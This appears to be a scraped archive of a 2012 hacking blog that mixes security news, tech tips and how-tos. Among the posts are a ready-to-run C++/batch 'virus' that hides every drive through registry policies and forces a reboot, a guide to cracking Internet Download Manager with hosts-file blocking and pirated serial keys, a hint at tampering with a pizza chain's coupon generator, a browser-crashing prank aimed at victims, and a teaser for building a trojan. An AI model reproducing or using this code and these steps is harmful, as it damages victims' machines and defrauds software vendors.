Hacking Dominos Coupon Generator – Free Dominos Pizza Coupons & Discounts


After multiple failed attempts to place an order of pizza and getting tired of taking follow-ups from folks at Axis Bank and Bill Desk (the gateway that  takes care of Dominos's online pizza orders) , I was frustrated a lot. Then , I came across Domino's Slot machine coupon generator. An innocent looking random coupon generator that is purely JS based and is easily hackable. NOW I AM NOT SAYING I HACKED IT AND ORDERED FREE PIZZA's , the payment gateway sucks soo much that I didn't ordered anything. But yes, I do have something to share with you.
Fire up your Google Chrome (that's enough) and open
http://pizzaonline.dominos.co.in/slot-machine/process-slot.php
You will see the Coupon Generator, fill in the captcha and play it, in normal circumstances , chances are -
You will win a coupon , if you are feeling lucky, you can try once more and then if you win again, you will have to deal with the final discount coupon you get.
You will get a "Try Again", you can try till the case 1 is fulfilled.

[Update] IDM 6.11 with serial key free download full crack patch and keygen Latest version 2012

Internet Download Manager is a download accelator. By using this software we are able download from the Internet at a high speed.But when we are downloading the software from its official site it is not a full version. That is a 30 day trial pack. After these days are past it will ask you to enter serial key or to buy. So here is the process to make any latest downloaded IDM full version.After making this it will be registered for lifetime and not ask to register it further.

Here I will describe how can we make an latest IDM full version using some serial keys and adding some tricks.

Download Link: http://www.internetdownloadmanager.com/download.html

Otherwise download any version of idm and make it full version from the below process by using the serial keys and some simple changes in the hosts file.

Process:

1. Download the latest version IDM from here and install it.

2. Navigate to "C:\Windows\System32\drivers\etc" on your computer.

3. In the "etc" folder you will find a file with name "hosts"

4. Now right click on the Hosts file and choose "properties" and Navigate to "security" tab on the property window.

5. Now click on "Advanced" and Navigate to "owner" tab on the Advanced Security Option.

6. Click on "edit".

7. A new window will be opened. There you will find a table asking for "change Owner to". Now change there to your local user on which you logged on.(e.g. USER-PC or anything on your system. Not the Administrator user)

8. Below that you will find an check box "replace owner on sub containers and objects".

9. Just tick the check box.

10. Now apply all the modified setting. During apply the changes it will show an message "You dont have the permission to read the file or the contents of the directory. Do you want to change the permission of the file or folder to full control. All permission will be replaced if you press ok". Just Ignore the message and press OK.

11. Now again Right click of mouse onthe "Hosts" file and choose "properties" then Navigate to "security" tab.

12. Now click On "Edit" on the "Group or User Names" section.

13. A new window for permission will be opened.In the permission window choose the logged or local user and in the "Permission For User" tab tick on "Full Control".

14. Now apply those changes. And click on "ok"

15. Now open the "Hosts" file with notepad and Copy the below bold letters and paste it in the hosts file.


127.0.0.1 tonec.com

127.0.0.1 www.tonec.com

127.0.0.1 registeridm.com

127.0.0.1 www.registeridm.com

127.0.0.1 secure.registeridm.com

127.0.0.1 internetdownloadmanager.com

127.0.0.1 www.internetdownloadmanager.com

127.0.0.1 secure.internetdownloadmanager.com

127.0.0.1 mirror.internetdownloadmanager.com

127.0.0.1 mirror2.internetdownloadmanager.com



16. Now save the hosts file.

If you are facing any difficulty in saving the hosts file then you see the how to take ownership of a file.

Because, without taking the ownership we will not be able to modify the hosts file.

17. Now open Your Installed IDM application. Click on "registration" on the menubar and choose "Registration".

18. When you click on registration, Now a new window Will be open ask your First Name, Last Name, Email Address and Serial Key.

19. Enter your First name, Last Name, Email address in the required field. In the serial key field enter any of the following given below



RLDGN-OV9WU-5W589-6VZH1

HUDWE-UO689-6D27B-YM28M

UK3DV-E0MNW-MLQYX-GENA1

398ND-QNAGY-CMMZU-ZPI39

GZLJY-X50S3-0S20D-NFRF9

W3J5U-8U66N-D0B9M-54SLM

EC0Q6-QN7UH-5S3JB-YZMEK

UVQW0-X54FE-QW35Q-SNZF5

FJJTJ-J0FLF-QCVBK-A287M

20. And click on ok to register. that is it. Now your latest IDM become full version with the registration.

Enjoy and cheers...................

NSA to Hackers: A Little Help?


"The term 'hacker' is a morally neutral term that is charged with connotation," said Randy Abrams, research director at NSS Labs. "What we are talking about is [the NSA] reaching out to people with exceptional computer skills. Some of these are decent people and some are not; some have political visions that are in line with our government's, and others don't."

United States National Security Agency Director Keith Alexander has urged hackers to contribute to securing cyberspace.

Speaking at the DEFCON 2012 security conference, Alexander said the hacker community and the U.S. government cybercommunity share some core values.

"At DEFCON 20, Gen. Alexander discussed shared challenges and shared responsibilities in cyberspace," NSA spokesperson Vanee Vines told TechNewsWorld. "He also told DEFCON participants that they have the ability to help educate the nation about cybersecurity."

A summary of Alexander's speech can be viewed here.

"Hackers are often patriotic and many, particularly at DEFCON, think of themselves as the good guys," said Rob Enderle, principal analyst at the Enderle Group. "Calling on them for help both showcases the reality that the problems can't be handled by government alone and appeals to both attributes to garner assistance."


The General in His Labyrinth

Global society needs the best and brightest to help secure our most valued resources in cyberspace, Alexander said. Those resources are our intellectual property, our critical infrastructure, and our privacy.

Hackers can help educate people who don't understand cybersecurity as well as they do, he added. He also stated that the private sector and the government need to improve their information sharing.

The hacker community has built many of the tools needed to protect cyberspace, such as Metasploit, Alexander remarked. He also praised hackers, stating they figure out vulnerabilities in our systems.

Yes, but Hackers?

It's the suspicion that governments and law enforcement agencies are spying on individuals that hacktivist groups such as Anonymous cite when they attack government and law agency websites.

Law enforcement agencies around the world have responded by cracking down on hacktivists, sometimes painting them as cyberterrorists and cybercriminals.

In 2011, the U.S. Federal Bureau of Investigation and law agencies abroad cracked down on suspected members of Anonymous, a move that saw 16 suspects arrested in the U.S. alone.

In February, the international police organization Interpol arrested 25 suspected Anonymous members.

In both cases, the crackdowns triggered retaliatory attacks by hacktivists on various targets, including U.S. government websites. Interpol's website was apparently taken down after the February arrests.

In the Eye of the Beholder

"The term 'hacker' is a morally neutral term that is charged with connotation," Randy Abrams, research director at NSS Labs, told TechNewsWorld. "What we are talking about is [the NSA] reaching out to people with exceptional computer skills. Some of these are decent people and some are not; some have political visions that are in line with our government's, and others don't."

There is always a risk/reward equation in cybersecurity, "and you do not get the best rewards without taking some risks," Abrams continued. "Private industry is up against the same problems."

The U.S. government seems to be willing to tap any source of help, taking risks it apparently deems necessary. Alexander's call at DEFCON 12 was not the first time a U.S. government agency has reached out to hackers -- the Defense Advanced Research Projects Agency (DARPA) did so at a cybercolloquium in North Virginia in November.

"Virtually all governments" have been losing out to hackers," Enderle said. "Government is overmatched."

Nothing Personal - It's Just Business

The U.S. government agency's reach-out is "part of a strategic PR approach," NSS Labs' Abrams suggested. The war with hackers "is probably not winnable for the foreseeable future" and reaching out to hackers may help because "damage can be controlled with more and better resources."

However, "there is a deep distrust of government in [the hacker] community, and that will likely be the most difficult thing to overcome," Enderle pointed out. The government "is likely going to have to both give something back and address their concerns that the government itself is evil."

That distrust may not have been helped by Alexander's response to a question after his speech. He reportedly claimed that the NSA doesn't keep files on Americans, a statement that was challenged by William Binney, a former NSA technical director, during a panel discussion later.

Unless government addresses those concerns, its reaching out to hackers will fail, Enderle warned

Hackers Use Stolen Passwords to Jimmy Into Dropbox

The habit of using the same username and password combination for multiple sites has come around to bite Dropbox and its users. Network intruders who came into the possession of name/password combos from other sites, tried them out on Dropbox and were able to break into many users' accounts -- including the account of a Dropbox employee, which led to a deluge of spam.

Dropbox says reused passwords are to blame for a wave of spam that's hitting subscribers to the service.

The company found that usernames and passwords recently stolen from other websites were used to sign in to some Dropbox accounts. One of these accounts belonged to a Dropbox employee, and it contained a project document with some users' email addresses.

This improper access led to the spamming of many users, Dropbox said.

The company has taken various steps to improve security, including the coming introduction of two-factor authentication.

"The downside of not having more rigorous access controls in place around sensitive data is that they can be compromised," Todd Thiemann, senior director of product marketing at Vormetric, told TechNewsWorld. "Dropbox appears to have learned that the hard way."


Bless My Soul, What's Wrong With Me?

Some Dropbox customers began complaining about being spammed back in mid-July.

The company called in external investigators to look into the matter, and on Tuesday it said the situation was most likely attributable to usernames and passwords employed by its subscribers across multiple sites.

It has contacted customers whose accounts had been hijacked and helped them protect their accounts.

"Given [Dropbox's] poor track record when it comes to security, I was floored" by the company's statement about contacting users whose accounts had been hijacked, said Rob Sobers, technical marketing manager at Varonis.

"They are assuming they know exactly which accounts were compromised," Sobers told TechNewsWorld. "What about the accounts whose passwords might have been stolen but haven't been breached yet?"

All Shook Up

"What other customer information is stored in Dropbox folders -- credit card data? Passwords?" Varonis's Sobers asked. "Which employees have access to customer data? Of the employees that have access to customer data, how many of them reuse their passwords?"

As for the project document stolen from a Dropbox employee whose account was hijacked, "A Dropbox employee should have clearly defined policies surrounding password strength and reuse for anything they do with customer data, regardless of where it's stored," Randy Abrams a research director at NSS Labs, told TechNewsWorld.

Encrypting sensitive data in cloud services such as Dropbox is critical because, "as a rule of thumb, anything stored in the cloud that's not meant to be a Playboy Expose should be encrypted," Abrams continued.

Upping the Security Ante

Measures Dropbox is taking to improve security include two-factor authentication, new automated mechanisms to help identify suspicious activity, and a new page that lets users examine all active logins to their account.

The company may require users to change their passwords in some cases, for example where the passwords are commonly used or haven't been changed in a long time.

It is also recommending that users set a unique password for each website they use.

"Going forward, integrating password education with regularly mandated password changes would be a good thing," NSS Labs' Abrams said.

However, "the problem is that a policy of password-only security is outdated," Leonid Shtilman, CEO of Viewfinity, told TechNewsWorld. He advocates using biometric facial recognition technology.

Comments on Security Measures

Password reuse across multiple sites "is a universal problem ... and it's better for services such as Dropbox to offer multi-factor authentication, given the gravity of data that people store on these systems," Frank Artes, a research director at NSS Labs, told TechNewsWorld.

In the interim, it would be a best practice to force a full change of passwords and set a threshold on password strength, Artes suggested.

Computer security "is an evolving process, driven by the harsh reality of computer crime," David Perry, global director of education at Comodo, told TechNewsWorld. "I have no doubt that this kind of 'oops' moment will be very common over the next decade."

Dropbox did not respond to our request to comment.

The 10 Best Open Source Projects You Should Be Volunteering To Help With


The success of Open Source projects has defied the old saying – too many cooks spoil the broth. If you doubt the success of the open source initiative, you just have to look at Firefox and WordPress, probably two tools that are helping you to read most of the web. Then, you probably are fixing up a date on an Android phone.
My colleague X.E.R.O explained Why You Should Contribute To Open Source Projects [Opinion]. You aren’t a coder? Read 8 Ways To Help Open-Source Projects If You’re Not A Coder. You could be a writer, a designer, a translator, just a Facebook or Twitter junkie, or someone who wants to just donate money for the cause. There are different levels where you can put your two bits. And here are ten of the many open source projects where you can.

Mozilla Developer Network

Soon Domain names(Web Addresses) in Indian 22 Indian language


Imagine you are typing a URL like भारत.भारत or भारत.in or you have got a domain name which is in your language say HINDI or BANGLA or MARATHI etc.This sound very interesting to have domain name as the same as what we talk in our Typical regional language. As of now Internet Corporation for Assigned Names and Numbers which is  International non-profit body that oversees allocation of domain names globally. (ICANN) has allowed India to register website addresses in as many as seven regional languages (Hindi, Gujarati, Urdu, Punjabi, Bengali and Telugu).

Creating undetectable computer virus surprisingly simple

Since the Flame computer virus was discovered earlier this week, much attention has been focused on the cleverness of this piece of malicious code.

Some online security experts say the fact that Flame — alternatively known as Flamer or sKyWIper — went unnoticed for two years highlights another problem: the poor state of virus detection.

“Why does detection suck so much in the year 2012?” asks Brian Bourne, a Toronto-based cyber-security expert and founder of the SecTor cyber-security conference.

Remove an Outlook e-mail profile or Signout from outlook


An e-mail profile is made up of e-mail accounts, data files, and information about where your e-mail is stored. If you are unfamiliar with e-mail profiles, see overview of Outlook e-mail profiles.
1.In Microsoft Windows, click the Start button, and then click Control Panel.
2.Do one of the following:
Windows Vista    Click User Accounts, and then click Mail.
 NOTE:   In Classic view, double-click Mail.
Microsoft Windows XP    Click User Accounts, and then click Mail.
 NOTE:   In Classic view, double-click Mail.
3.The Mail icon won't appear unless you have Outlook installed and have run the program at least once.
The Mail Setup dialog box opens.

Goodbye Delhi


Finally friends..I have packed my bags up, and i m almost set to leave the heart of India. My stay here was excellent,a great family,bindass people,loads of knowledge and the opportunity of meeting new people and making new contacts.I especially thanks to my mentors and great friends Rohit sir, Naseem  sir ,Naveen sir and Sunil sir and ofcourse Rahul sir who have taught me on how to be more professional and to channelize my energy for the right cause. 

I will miss all the friends I have made.
Love you Delhi
KD

 PS: Since I m leaving to a much more jargoned place, expect some delays in web postings and articles..will be 100% online after june.

41MP Nokia 808 smartphone launches in India


NEW DELHI: Nokia's 41MP camera phone is finally in India. The 41 megapixel smartphone is available on the Nokia Shop at Indiatimes.com at price of Rs 29,999.


Nokia PureView 808 has generated lot of interest due to the PureView imaging technology and the gigantic 41-megapixel camera sensor on-board. Other features of the smartphone include Carl Zeiss optics with 4X lossless zoom and Nokia Rich Recording.


The smartphone sports a 4-inch 360 x 640 pixel resolution display and is powered by a 1.3 GHz ARM 11 processor. Running on Nokia's Symbian Belle OS, the smartphone comes with a 16GB of internal memory.


Nokia 808 PureView is presently available in black colour.


TRICK TO READ PUNJABI FONT POSTS IN MOBILES


TRICK TO READ PUNJABI FONT POSTS IN MOBILES

HERE IS THE TRICK TO READ POSTS WRITTEN IN PUNJABI FONTS USING MOBILES. USUALLY THE PUNJABI FONT
APPEARS AS BOXES IN MOBILES AND IS NOT READABLE. SO TO READ SUCH POSTS USE THIS TRICK.
please follow the instructions carefully and don't change any other setting except the one discribed below.IT MAY CRASH THE SOFTWARE.
if some setting is changed accidently then just uninstall the software and reinstall it again.

here are the steps

1. DOWNLOAD 'OPERA MINI' SOFTWARE AND INSTALL IN MOBILE
(TO INSTALL OPEN m.opera.com in mobile browser and download opera mini  from website)


2. open opera mini and write following command in address bar. before writing erase 'www' which is present by default


opera:config


NASA SSL Digital Certificate hacked by Iranian Hackers

NASA SSL Digital Certificate hacked by Iranian Hackers



Iranian hackers 'Cyber Warriors Team' announced in an online post that it compromised an SSL certificate belonging to NASA and subsequently accessed information on thousands of NASA researchers. A space agency representative revealed that they’re currently investigating the incident.

Microsoft Store India got hacked in India !



Today, Hackers from group EvilShadow successfully hack and deface the website of Microsoft Store India (http://www.microsoftstore.co.in) . But Hacker upload his deface page at location http://www.microsoftstore.co.in/evil.html .

The Hackers Conference 2012 Call For Papers #THC2012


We are extremely delighted to announce the Call for Papers for The Hackers Conference 2012 It is a unique event, where the elite of the hacker world, leaders in the information security industry and the Internet community meet face to face to join their efforts to cooperate in addressing the most topical issues of the IT world.

Conference will be held in New Delhi, India and aims to get together industry, government, academia and underground hackers to share knowledge and leading-edge ideas about information security and everything related to it.

The following list contains major topics the conference will cover. Please consider submitting even if the subject of your research is not listed here.

Topics
Cloud Security
Wireless hacking
GSM/VoIP Security
Smartphone / Mobile Security
Exploit development techniques
Advance in reverse engineering
National Security & Cyber Warfare
New Vulnerabilities and Exploits/0-days
Antivirus/Firewall/UTM Evasion Techniques
New Web attacks and application hacking
Mobile Application Security-Threats and Exploits
Hardware hacking, embedded systems and other electronic devices
Malware development and Analysis of Malicious Code / Viruses / Malware
Security aspects in SCADA, industrial environments and "obscure" networks
Important Dates:
CFP Opens: 1st May 2012
1st round of Speaker list Online: 1st June 2012
CFP Closing Date: 1st July 2012
Final speakers List online: 10th July 2012
Conference Dates: 29th July 2012
Speaker Benefits:
Free pass to the conference
Accommodation during the Conference
Call for Papers is opens until 1st July 2012 so if you have interesting topics to present at The Hackers Conference you are welcome to submit!

Submission Guidelines from Thehackersconference.com/cfp.html and you can Email your submission to: cfp@thehackersconference.com

Join #THC2012 on Facebook : https://www.facebook.com/TheHackersConference

IBM Research domain hacked and defaced



Hacker collective group dubbed Kosova Hacker Security or in other word KHS targeted IT giant & multinational technology and consulting corporation IBM. In this attack KHS successfully hacked into the official site of IBM Researcher (http://researcher.ibm.com).

Hacker collective group dubbed Kosova Hacker Security or in other word KHS targeted IT giant & multinational technology and consulting corporation IBM. In this attack KHS successfully hacked into the official site of IBM Researcher (http://researcher.ibm.com).
Hackers claims that, site had a SQL injection & remote code execution vulnerability using which they deface the website. At the time of writing the hacked url not working and Mirror of Hack can be seen here.

Hackers said,"we hack that why we dont like they computers :/ k".

Oracle Database new zero day exploit put users at risk

Oracle Database new zero day exploit put users at risk
oracle

Oracle has recommended workarounds for a zero-day Oracle Database flaw that was not fixed in the company's April critical patch update. Oracle issued a security alert for Oracle TNS Poison, the vulnerability, disclosed by researcher Joxean Koret after he mistakenly thought it had been fixed by Oracle, allows an attacker to hijack the information exchanged between clients and databases.

Keyloggers (Keystroke Loggers)


Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.

There are two types of keystroke loggers:

1. Software based and
2. Hardware based.

Spy ware: Spector (http://www.spector.com/)

Who Used Your Pc In Your Absence


Who Used Your Pc In Your Absence,what Did He Do?
 first you should go
start > run >eventvwr.msc 
Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived.
For our purposes we want the System log. Click on "System" in the left-hand column for a list of events.
Look for a date and time when you weren't home and your computer should have been off.
double click on the eg: info n it will show u the detail.
You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day. Hope u all will like it.

Thanks n enjoy

How to Protect Your Computer from Keyloggers


Keyloggers have been a major problem today as it does not require any prior knowledge of computers to use it. So hackers mainly use keyloggers to steal your passwords, credit card numbers and other confidential data. Below are some methods through which you can protect your computer from keyloggers: 
Use a Good Antivirus


This is the first and basic step that you need to take in order to protect your computer from keyloggers. Use a Good antivirus such as Kaspersky, Norton or Mcafee and update it regularly.
Use a Good Antispyware


Since keyloggers are basically spywares, if you are a frequent user of Internet then you could be exposed to thousands of keyloggers and spywares. So you should use a good antispyware such as NoAdware.

Wi-Fi Compromised ? Track Wi-Fi Hackers Using MoocherHunter






Got a Wi-Fi net connection ? And do you think it is secure enough ? With the onset of cyber crimes taking place,your Wi-fi may be used illegally by hackers or some other people.Either you may get high internet bills in reward or you may be on headlines as your net may be compromised to send malicious emails to anyone,that's what happened in India sometime ago in Mumbai Bomb blast case. Well,there comes MoocherHunter™ to rescue.

MoocherHunter™ is a mobile tracking software tool for the real-time on-the-fly geo-location of wireless moochers and hackers. If you have ever wondered about the possibility of your wireless network getting used for illegal purposes, you must consider using Moocher Hunter. Using Moocher Hunter you can identify the location of the person i.e. an unauthorized user using your wireless network. Its then upto you to either give him a stern warning of not using your wireless network again or complaining to the legal authorities.

Top 10 Google Chrome Hacks


Top 10 Google Chrome Hacks 
 1) Load Multiple Sites Every Time You Open Your Browser 
  To configure your google chrome to load multiple sites every time you open your browser , go to Settings

Painfully Computer Pranks

Computer pranks to freak out your friends and make them crying for mummy

I've been posting many articles about computer pranks on this blog (Deadly Virus Prank, The Ultimate Virus,How to Create a Fake and Harmless Virus and Facebook Virus Prank). Today , I will show you 5 great computer pranks that will frustrate your victims very much. These pranks could be very painfully, so please use them at your own risk ;)

1. Crash a Computer System With Nothing But a URL!

I stumbled across this URL while surfing the internet. This is a javascript "exploit" (that still works, by the way) and will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM.

WARNING: CLICKING ON THE LINK BELLOW MAY CAUSE A CRASH! USE AT YOUR OWN RISK!

The top ten technology companies in the world


Apple: $590.82 billion The cream of crop among technology companies is Apple. Already the world’s most valuable company, it is tipped to become the first company to blow past the $1 trillion mark. There were some concerns about growth slowing down after the demise of its iconic founder Steve Jobs died but Tim Cook has been a worthy successor. What’s next? How about a refurbished Apple TV.


IBM: $238.07 billion The servers to services behemoth sits pretty in the number two spot. ‘Big Blue’ the 100 plus year old company, has gone through many changes and braved stormy weather when the technology landscape kept changing and its business models were under question. It has emerged unscathed and continues to look optimistically at the future.

Microsoft: $264.48 billion Some would say no Microsoft, no PC industry. The iconic company that was the poster child of the PC revolution continues to crank up huge revenues and profits. It survived the browser wars with Netscape and now battles Google, Apple and Facebook for technological supremacy.

Airtel launches 4G services at Rs 999/month


Bharti Airtel, has launched India’s first 4G services in Kolkata today. Airtel , which had bagged BWA spectrum in four telecom circles -- Kolkata, Maharastra, Punjab and Karnataka -- for Rs.3,314.36 crore in 2010, selected Chinese telecom equipment maker ZTE to manage its services in Kolkata. The services are priced between Rs 999 per month to Rs 1999 per month for with a free quota of 6- 9 GB.

Windows 7 “God Mode” Has All the Controls


The name would imply much more powerful and potentially devious capabilities, as seen in most games these days.  Instead, the “God Mode” folder for Windows 7 supplies a tidy place to find nearly everything you can do within the Windows Control Panel.

To access the special capabilities of the God Mode folder, create a new folder anywhere on your Windows 7 computer and name it:

GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

Once renamed, the icon will change to a control panel looking icon, and when opened you will be presented with a plethora of different tweaking options. On my Windows 7 Professional machine, I was shown 274 options.  It appears to hold the main keywords for each option to use the search function within the control panel.

Word has it that this hack also works on Vista 32-bit, but crashes on 64-bit versions.


List of faces, Facebook (2012)


The trick of the year, at least so far, is definitely a bug in the Facebook  system that allows you to insert new and an endless amount of emoticons in chat and messages .
Thanks to this trick anyone can create new smileys that you can send to friends (and others) in chat, or use to customize and beautify your messages on Facebook.
Today we have gathered for you a list of brand new and unique smileys for Facebook ! To use them, simply copy the code of the emoticon on the chat.

Facebook shortcuts : everyone should know

For FireFox:

    Shift+Alt+1: View your News Feed
    Shift+Alt+2: View your own Profile
    Shift+Alt+3: View pop-up of friend requests
    Shift+Alt+5: View pop-up of notifications
    Shift+Alt+6: View Account Settings
    Shift+Alt+7: View Privacy Settings
    Shift+Alt+? : Search bar 

For Google Chrome:
  • Alt+?: Search  
  • Alt+1: View your News Feed
  • Alt+2: View your own Profile
  • Alt+3: View pop-up of friend requests
  • Alt+4: View pop-up of messages
  • Alt+5: View pop-up of notifications
  • Alt+6: View Account Settings
  • Alt+7: View Privacy Settings
  • Alt+8: View Facebook’s own profile
  • Alt+9: Read latest Terms of Service agreement.

MULTIPLE LOGIN IN YAHOO MESSENGER


 

Multiple login in yahoo Without Using any Software
You can login with multiple id’s on the same yahoo messenger without
any download or patch .
Follow these steps :
1. Go to Start —-> Run . Type regedit, then enter .
2.Navigate to HKEY_CURRENT_USER ——–> Software —>yahoo
—–>pager—->Test
3.On the right page , right-click and choose new Dword value .
4.Rename it as Plural.
5.Double click and assign a decimal value of 1.
Its done!!
Now close registry and restart yahoo messenger and try Multiple Login


UK Facebook Hacker Jailed For 8 Months


It’s a pretty harsh sentence if you ask me, especially since Facebook decided in July 2011 to start paying bug bounties.
I have to say though, this guy must be a pretty talented hacker to break into the Facebook servers – they aren’t exactly low hanging fruit. I’d imagine they are some of the most hammered servers in the World (especially by script kiddies).
Sadly, however talented he is, or whatever his intention was in reality – what he did was illegal and he can be punished (fairly harshly) for it.

Automatic SQL Injection Tool – SQLMAP


Sqlmap is an open source command-line automatic SQL injection tool and its goal is to detect and take advantage of SQL injection vulnerabilities in webapplications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.Enthusiastics can experiment with its opotions and pwn many of the servers around,or can test their skills to secure their servers..but remember,SQL map is a tool,its might help you to find and apply vulnerabilities and injections,but in the end,you really must have a good knowledge of SQL some real pwning out there..
You Can download sqlmap 0.7 here:
Linux Source: sqlmap-0.7.tar.gz 
Windows Portable:
 sqlmap-0.7_exe.zip

Breaking the Internet: Researchers Successfully Hack SSL


Secure Socket Layers and Transport Layer Security (SSL/TLS) is the foundation of Web security. Banks, travel booking sites, social networks like Facebook and Twitter, email services and a plethora of other industries built their security based on the fact that it is very hard to crack SSL. Yet, a group of researchers has figured out how to do just that.
SSL encryption protects data in transit from the client to the server. This communication happens very rapidly and the encryption effectively makes a secure tunnel for information. The researchers that have cracked SSL used a vulnerability that until now was considered only a theory. Like wormholes.

Plesk control panel bug left FTC sites (and thousands more) exposed to Anons


A critical vulnerability in some versions of Parallels' Plesk Panel control panel software appears to have been key to the recent penetration of two servers hosting websites for the Federal Trade Commission. The vulnerability in the software, which is used for remote administration of hosted servers at a large number of Internet hosting companies, could spell bad news for hosting providers who haven't applied the latest updates, as well as their customers.
Because the vulnerability allows someone to make significant changes to the user accounts, files, and security of a targeted site, hackers who took advantage of the Plesk vulnerability may still have access to sites they have breached even after patches are applied. If your site is hosted with a provider that uses Plesk for site administration, it's worth taking a good look at the content on your server, and the accounts configured to access it—and resetting all your accounts' passwords.

Export Excel CSVs with Double Quotes

Excel allows you to save spreadsheets using CSV file format. This particularly helpful as you or your client may have data, say a product catalogue, that can be imported into another application. Continuing the example you may want to import this data into a shopping cart system like Magento. This all sounds good so far but Microsoft in their wisdom don't allow you to alter preferences for the CSV file format. Excel does it's own thing and if that does not match your way or the software you want to import the data into then things get a little more complicated.

New Steganography method TranSteg hides Data in VoIP(IP Telephony)

Researchers from Warsaw University of Technology, Institute of Telecommunications find a new Steganography method that helps to hide the Data in VoIP(IP Telephony).  The method is named as "TranSteg((Transcoding Steganography)".  

Voice over IP (VoIP), or IP telephony, is one of the services of the IP world that is changing the entire telecommunication’s landscape. It is a real-time service, which enables users to make phone calls through data networks that use an IP protocol.

C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.

C++ Virus Code :

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( "C:\\WINDOWS\\system32\\HackingStar.bat" ); /*opening or creating new file with .bat extension*/

write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n"; write<<"shutdown -r -c \"Sorry Your System is hacked by us!\" -f"<<"\n"; write.close(); //close file ShellExecute(NULL,"open","C:\\WINDOWS\\system32\\HackingStar.bat ",NULL,NULL,SW_SHOWNORMAL); return 0; }


Automatic SQL Injection Tool – SQLMAP


Sqlmap is an open source command-line automatic SQL injection tool and its goal is to detect and take advantage of SQL injection vulnerabilities in webapplications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.Enthusiastics can experiment with its opotions and pwn many of the servers around,or can test their skills to secure their servers..but remember,SQL map is a tool,its might help you to find and apply vulnerabilities and injections,but in the end,you really must have a good knowledge of SQL some real pwning out there..
You Can download sqlmap 0.7 here:
Linux Source: sqlmap-0.7.tar.gz 
Windows Portable:
 sqlmap-0.7_exe.zip

Flash Tutorial Links


Most of the times I have been intrigued by the quality of flash based games and animations which appear on net and dazzle the netizens.I always thought of learning Adobe Flash (previously Macromedia flash) and to create my own animations and games. However,due to lack of good tutorials I wasn’t able to learn much about it and my bandwidth don’t permits me to download all the video tutorials the deviants of flash had to offer.So I have compiled a list of tutorials and resource website which offer fantastic flash resources and tutorials for those who crave for them.
I found these flash
actionscript tutorials while stumbling across the net.Many of them are game design, sound and server side specific.Others are more general.
I hope you enjoy them whilst making full use of them and most important,I hope you share your flash tutorial bookmarks too !!! 

NSDECODER – automatic Malware detection tool


Nosec has introduced NSDECODER which is a automated website malware detection tools. It can be used to decode and analyze weather the URL exist malware. Also, NSDECODER will analyze which vulnerability been exploit and the original source address of malware.
Functionality

  • Automated analyze and detect website malware.
  • Plenty of vulnerabilities.
  • Log export support HTML and TXT format.
  • Deeply analyze JavaScript. 

Make a simple Trojan in VB


Visual Basic is an easy programming language.So easy that most of advanced programmers don't even compare it to behemoths like C/Pascal/C++/PERL etc.But it seriously packs punch due to its ease in programming and predefined procedures.Earlier wrote on how to lock keyboard and mouse using VB. This time I will be discussing on how to write a simple trojan in VB .Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code. The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go through what you need for both and some sample code. 

 
Design by gitstein | Bloggerized by Kuldeep